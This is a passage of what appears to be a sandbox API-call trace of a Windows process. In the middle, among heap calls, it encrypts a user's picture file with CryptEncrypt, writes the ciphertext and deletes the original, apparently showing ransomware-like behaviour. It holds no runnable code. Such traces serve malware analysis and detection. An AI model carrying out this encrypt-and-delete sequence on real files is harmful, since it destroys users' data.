lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0088.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0088.350] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.350] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0088.350] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0088.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0088.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0088.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0088.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0088.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0088.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0088.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0088.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0088.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0088.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0088.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0088.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0088.351] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0088.351] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.351] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0088.351] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.353] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca4f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0088.353] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0xf65b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0xf660) returned 1 [0088.353] CharLowerBuffW (in: lpsz="byte[63073]", cchLength=0xb | out: lpsz="byte[63073]") returned 0xb [0088.355] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.355] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca958, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0088.355] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499a008*, pdwDataLen=0x144e790*=0xf65b, dwBufLen=0xf660 | out: pbData=0x499a008*, pdwDataLen=0x144e790*=0xf660) returned 1 [0088.401] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0088.402] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0088.403] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.405] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xf660, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144f194*=0xf660, lpOverlapped=0x0) returned 1 [0088.408] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0088.408] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.408] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0088.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca250, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0088.408] CryptDestroyKey (hKey=0x41ac600) returned 1 [0088.408] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0088.408] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0088.408] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.408] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0088.408] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0088.408] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.409] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.409] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0088.409] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0088.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0088.409] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0088.409] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.409] FreeLibrary (hLibModule=0x756e0000) returned 1 [0088.409] CloseHandle (hObject=0x298) returned 1 [0088.409] CloseHandle (hObject=0x258) returned 1 [0088.412] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\GbOsv53gLsdhP15shLc.jpg", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\GbOsv53gLsdhP15shLc.jpg", lpFilePart=0x0) returned 0x30 [0088.412] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\GbOsv53gLsdhP15shLc.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\gbosv53glsdhp15shlc.jpg")) returned 0x20 [0088.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0088.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0088.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0088.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0088.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0088.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0088.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0088.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0088.413] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\GbOsv53gLsdhP15shLc.jpg", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4964680, ftCreationTime.dwHighDateTime=0x1d5eda8, ftLastAccessTime.dwLowDateTime=0xa9998330, ftLastAccessTime.dwHighDateTime=0x1d5ec95, ftLastWriteTime.dwLowDateTime=0xa9998330, ftLastWriteTime.dwHighDateTime=0x1d5ec95, nFileSizeHigh=0x0, nFileSizeLow=0xf65b, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="GbOsv53gLsdhP15shLc.jpg", cAlternateFileName="GBOSV5~1.JPG")) returned 0x41ac600 [0088.413] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\GbOsv53gLsdhP15shLc.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\gbosv53glsdhp15shlc.jpg")) returned 1 [0088.458] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4964680, ftCreationTime.dwHighDateTime=0x1d5eda8, ftLastAccessTime.dwLowDateTime=0xa9998330, ftLastAccessTime.dwHighDateTime=0x1d5ec95, ftLastWriteTime.dwLowDateTime=0xa9998330, ftLastWriteTime.dwHighDateTime=0x1d5ec95, nFileSizeHigh=0x0, nFileSizeLow=0xf65b, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="GbOsv53gLsdhP15shLc.jpg", cAlternateFileName="GBOSV5~1.JPG")) returned 0 [0088.458] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0088.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0088.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0088.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0088.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0088.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431de60 | out: hHeap=0x1780000) returned 1 [0088.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0088.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0088.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0088.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0088.458] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0088.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0088.458] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0088.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0088.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0088.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0088.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0088.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0088.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0088.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0088.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0088.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0088.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0088.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0088.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0088.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0088.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0088.459] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0088.459] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0088.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0088.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0088.459] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0088.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0088.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0088.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0088.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21f0 [0088.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0088.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0088.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0088.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0088.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0088.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0088.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0088.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0088.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0088.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0088.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0088.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0088.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0088.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9940 [0088.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0088.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0088.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0088.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0088.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0088.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9b78 [0088.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0088.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0088.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0088.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0088.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0088.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0088.460] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0088.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0088.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0088.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0088.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0088.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0088.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0088.460] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0088.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0088.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0088.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0088.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0088.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0088.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0088.460] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\h5_ZfAY-6STnb.gif", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ed3ce30, ftCreationTime.dwHighDateTime=0x1d5ee91, ftLastAccessTime.dwLowDateTime=0xefa98900, ftLastAccessTime.dwHighDateTime=0x1d5e156, ftLastWriteTime.dwLowDateTime=0xefa98900, ftLastWriteTime.dwHighDateTime=0x1d5e156, nFileSizeHigh=0x0, nFileSizeLow=0x1880d, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="h5_ZfAY-6STnb.gif", cAlternateFileName="H5_ZFA~1.GIF")) returned 0x41ac540 [0088.461] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0088.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0088.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0088.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0088.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0088.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0088.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0088.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0088.461] CharUpperBuffW (in: 